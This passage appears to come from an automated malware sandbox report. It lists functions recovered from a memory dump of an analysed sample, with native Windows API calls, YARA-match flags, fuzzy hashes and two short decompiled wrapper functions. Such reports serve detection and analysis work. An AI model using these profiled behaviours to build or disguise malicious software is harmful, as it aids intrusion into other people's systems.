                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A48A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18nativeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041A48A(void* __eax) {
				void* __esi;
				long _t9;
				void* _t11;
				void* _t13;

				_t6 =  *0xFFFFFFFF8BEC8B5D;
				_t2 = _t6 + 0x10; // 0x300
				_t3 = _t6 + 0xc50; // 0x40a943
				E0041AF60(_t11, _t13, _t3,  *0xFFFFFFFF8BEC8B5D, _t3,  *_t2, 0, 0x2c);
				_t9 = NtClose( *0xFFFFFFFF8BEC8B61); // executed
				return _t9;
			}







                    0x0041a493
                    0x0041a496
                    0x0041a49f
                    0x0041a4a7
                    0x0041a4b5
                    0x0041a4b9

                    APIs
                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID: |j]
                    • API String ID: 3535843008-2280844170
                    • Opcode ID: f3bea203bdf89a582c5e28b2328a93e87e997c41c1792388143d87f01e16f298
                    • Instruction ID: 2bd7d605dc9b6bf0b5616078ad4ce38f7b33599b8aef5089775911611445b326
                    • Opcode Fuzzy Hash: f3bea203bdf89a582c5e28b2328a93e87e997c41c1792388143d87f01e16f298
                    • Instruction Fuzzy Hash: D5D02BA94092C04BC710EAF464C10C67B40DD406187244DCEE8D847207D128D6165392
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A35B, Relevance: 1.6, APIs: 1, Instructions: 62filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: f7d17fcdca2f04d08c26e25dccd3b025c16ba96a20ecda3e57daa5e63cba7025
                    • Instruction ID: 8be2e99e4947dc9901a49d9add03c403e68e32f92b34c06053dc6282d84bcd9b
                    • Opcode Fuzzy Hash: f7d17fcdca2f04d08c26e25dccd3b025c16ba96a20ecda3e57daa5e63cba7025
                    • Instruction Fuzzy Hash: 301115B2200208AFCB08DF89DC85DEB73ADEF8C718F148109FA0C97241D630E861CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A360, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A53C, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: 742927f3cf83c7465963415d3806a27fb7534f1a772e45855accd144e44c38b9
                    • Instruction ID: d35eaa645325c8222a5989e14eced1605b5582302af0532cf70d6e4d65d3aa2d
                    • Opcode Fuzzy Hash: 742927f3cf83c7465963415d3806a27fb7534f1a772e45855accd144e44c38b9
                    • Instruction Fuzzy Hash: A8F01CB2210208ABDB14DF89DC91EEB77ADEF8C754F158549FE5C9B241C630E911CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A490, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: a105522f18737afdd3de150e3a65e265dba9934b6f966ef2572593ff53880916
                    • Instruction ID: ee87163a0334f3c546b455c64c2f21f3d4efc380bd1346534c52300d69388dee
                    • Opcode Fuzzy Hash: a105522f18737afdd3de150e3a65e265dba9934b6f966ef2572593ff53880916
                    • Instruction Fuzzy Hash: A29002B120101902D140719984047460105A7D0351F71C011E9454654EC6998DD577A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: f910d644da5ec42aca0aadd80be6dd298713355a20d0c6d2e656b29504d1eda8
                    • Instruction ID: cf0dfdd77a9f80e5a127ab4b75994b40626b55ce941f4c49c3a00bece6b772ff
                    • Opcode Fuzzy Hash: f910d644da5ec42aca0aadd80be6dd298713355a20d0c6d2e656b29504d1eda8
                    • Instruction Fuzzy Hash: 509002A134101942D10061998414B060105E7E1351F71C015E5454654DC659CC527266
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 0855f305879db5a541256842661c0da005b90c922cea96d1b51ab8db81c2ab59
                    • Instruction ID: 3d73e3a956adec25d819fe75e08a662c771846cae75ae5da6d3d47c444016827
                    • Opcode Fuzzy Hash: 0855f305879db5a541256842661c0da005b90c922cea96d1b51ab8db81c2ab59
                    • Instruction Fuzzy Hash: 2F900261242056525545B19984045074106B7E02917B1C012E5804A50CC5669C56E761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 50a4e6b10ea48c7505b4e89ccca1451a28655255e8e5deb66b43361660fe6247
                    • Instruction ID: d72167b2fb4c08078c3e18ec33a7c3b2bdd7b122f4153990f12f4adabe24d19e
                    • Opcode Fuzzy Hash: 50a4e6b10ea48c7505b4e89ccca1451a28655255e8e5deb66b43361660fe6247
                    • Instruction Fuzzy Hash: D590027120101913D111619985047070109A7D0291FB1C412E4814658DD6968D52B261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010198F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 1c976ec2bd9a81aa7d2e642915ebaade194c872b549d677724c41779838e0c85
                    • Instruction ID: 3fc063ccc4fccc9eb0d273b34b49b5c2b77136868a602acbfbb9b21fd57f5580
                    • Opcode Fuzzy Hash: 1c976ec2bd9a81aa7d2e642915ebaade194c872b549d677724c41779838e0c85
                    • Instruction Fuzzy Hash: 3890026160101A02D10171998404616010AA7D0291FB1C022E5414655ECA658D92B271
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: d08aaea2fd19777ba3112cf471e0e4f54674075aab75045b87a0e01d596925d6
                    • Instruction ID: 4fc258700ffd22729ce832d766cdb35ccb3138bfaed5742b3beb8ea794fcdf8d
                    • Opcode Fuzzy Hash: d08aaea2fd19777ba3112cf471e0e4f54674075aab75045b87a0e01d596925d6
                    • Instruction Fuzzy Hash: D690027120141902D1006199881470B0105A7D0352F71C011E5554655DC6658C5176B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 570366d9583cecb7e57cab5415db1e124cc9583e81ad516a8a8973317da3a69b
                    • Instruction ID: 3e9b5b4444e5ec5f56f9257722eb1b86e47f349822cb088feaa08d65dbb3be1d
                    • Opcode Fuzzy Hash: 570366d9583cecb7e57cab5415db1e124cc9583e81ad516a8a8973317da3a69b
                    • Instruction Fuzzy Hash: AD90026160101542414071A9C8449064105BBE1261771C121E4D88650DC5998C6567A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7fefe75259d291b9040d6fe9dad83f60969f5d7727ea0b654ad5ba10b28068c0
                    • Instruction ID: f2bfdab2a1320ddc21340d1c77d0da6a703716f45a7b8f29dc116974c2f552e7
                    • Opcode Fuzzy Hash: 7fefe75259d291b9040d6fe9dad83f60969f5d7727ea0b654ad5ba10b28068c0
                    • Instruction Fuzzy Hash: 8690026121181542D20065A98C14B070105A7D0353F71C115E4544654CC9558C616661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 5280c61a771a2ea5a33117cfe6d528f78d81af52fa7ccfff62da5122115ace68
                    • Instruction ID: 5880a5b05980975c32980b7594c9a934872821905d37d21177977a306f8cfc03
                    • Opcode Fuzzy Hash: 5280c61a771a2ea5a33117cfe6d528f78d81af52fa7ccfff62da5122115ace68
                    • Instruction Fuzzy Hash: 22900265211015030105A59947045070146A7D53A1371C021F5405650CD6618C616261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: eb6640105ffc40f6a61ea37ff18a910fd43b2f6940f50864205ba2b084005e7a
                    • Instruction ID: 8028669808f33129442a4a681fe17abe62991cc45ef3a9bd171b4cfdc9d4ccf5
                    • Opcode Fuzzy Hash: eb6640105ffc40f6a61ea37ff18a910fd43b2f6940f50864205ba2b084005e7a
                    • Instruction Fuzzy Hash: 199002A120201503410571998414616410AA7E0251B71C021E5404690DC5658C917265
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: fc24e1f5aa55b5e528b0b4b94d87b4da1ed772ae5031354a3b33767ebc8ee761
                    • Instruction ID: 191c28b2c8d0c25894f977ef2bfd42aef6c60ea605aebd25c68e7b39a679da1c
                    • Opcode Fuzzy Hash: fc24e1f5aa55b5e528b0b4b94d87b4da1ed772ae5031354a3b33767ebc8ee761
                    • Instruction Fuzzy Hash: 2490027120101902D10065D994086460105A7E0351F71D011E9414655EC6A58C917271
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2edef82a11fc7acfcee5d06dae51ea98ba3588a169e856350dac1d91fbfb53fc
                    • Instruction ID: 86dacf91780967434c7dadac024d7c2e2f0e9cc6e368ec83198f11eabf6b31bd
                    • Opcode Fuzzy Hash: 2edef82a11fc7acfcee5d06dae51ea98ba3588a169e856350dac1d91fbfb53fc
                    • Instruction Fuzzy Hash: B790026921301502D1807199940860A0105A7D1252FB1D415E4405658CC9558C696361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010197A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 15b52f49ae51c358c7dbe84c3ab9af2dd10e2dd4b5a196d1e384e2068ea8e909
                    • Instruction ID: 604dbe2ca27786819bf8dfd39d0b48cd28b001b06d2eceb7e274c29a9cd51e0c
                    • Opcode Fuzzy Hash: 15b52f49ae51c358c7dbe84c3ab9af2dd10e2dd4b5a196d1e384e2068ea8e909
                    • Instruction Fuzzy Hash: 5D90026130101503D140719994186064105F7E1351F71D011E4804654CD9558C566362
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 49703f1d740e58d26d483b93ac045bd106730e2a9e9d765270a4a6ae2030fad6
                    • Instruction ID: 7057c20464e9235834c55bfe2684fa8c3fe2d940465292cf1e208e258bc0f00b
                    • Opcode Fuzzy Hash: 49703f1d740e58d26d483b93ac045bd106730e2a9e9d765270a4a6ae2030fad6
                    • Instruction Fuzzy Hash: 6290027120101D02D1807199840464A0105A7D1351FB1C015E4415754DCA558E5977E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: e9821b2f4787b6e2718a375ec9abe0015996017dc15cb976015a4db794b98e9d
                    • Instruction ID: bdc534fafd76f78e0bb0b21699fe6831900557b81843410f2c1f1ef1f8578717
                    • Opcode Fuzzy Hash: e9821b2f4787b6e2718a375ec9abe0015996017dc15cb976015a4db794b98e9d
                    • Instruction Fuzzy Hash: 2090027120109D02D1106199C40474A0105A7D0351F75C411E8814758DC6D58C917261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409AB0, Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                    • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A630, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041A630(void* __edx, intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* __esi;
				void* _t10;
				void* _t16;

				_t7 = _a4;
				E0041AF60(__edx, _t16, _a4 + 0xc70, _t7, _a4 + 0xc70,  *((intOrPtr*)(_t7 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}






                    0x0041a633
                    0x0041a647
                    0x0041a652
                    0x0041a65d
                    0x0041a661

                    APIs
                    • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 6EA
                    • API String ID: 1279760036-1400015478
                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408310, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                    • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A6DD, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessInternalW.KERNELBASE(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A734
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: 8d3d2534ead5815c3546b0fe9166efda06e9cd63d4074ea357af0417f930f132
                    • Instruction ID: d57bfb07a31592aee336ab9fb530e9007d0cfbe6c90ab69b17bc1a672a393ba5
                    • Opcode Fuzzy Hash: 8d3d2534ead5815c3546b0fe9166efda06e9cd63d4074ea357af0417f930f132
                    • Instruction Fuzzy Hash: 8401B2B6211108BFCB58DF89DC80EEB37ADAF8C754F158258FA0D97241D630E851CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A6E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessInternalW.KERNELBASE(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A734
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                    • Instruction ID: c0409bc591760e5b86b1b32807d612366400da8e17bcb8cc8f9e0bcd0fd11a44
                    • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                    • Instruction Fuzzy Hash: C601B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A7C1, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: ab5ee3665b620248444aa617e35fa004a2146ed7dfca3b241a30780ad4b87341
                    • Instruction ID: 56c4b5e02524ab4bf5cb25986af385b2c1844a2ef70cf53d5aa9dae5b3172efb
                    • Opcode Fuzzy Hash: ab5ee3665b620248444aa617e35fa004a2146ed7dfca3b241a30780ad4b87341
                    • Instruction Fuzzy Hash: 57F0A0B52422046BC714DF54DC41FE73B68AF89650F188054FE5817342D534A955CBF1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A662, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: a412c1437e812e873039ac27d450f2e254bc5ffaa80d983b6e0a5e7fb88b6b2b
                    • Instruction ID: fb9b73ff83cf81d9195f7fa7dbc6aab40189a8dc13e1fe4736f4157c0808c4f7
                    • Opcode Fuzzy Hash: a412c1437e812e873039ac27d450f2e254bc5ffaa80d983b6e0a5e7fb88b6b2b
                    • Instruction Fuzzy Hash: BCF0A9B6200240AFDB24DF24CC89EA7BBA8EF88314F14418CFC094B241C234F820CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A670, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
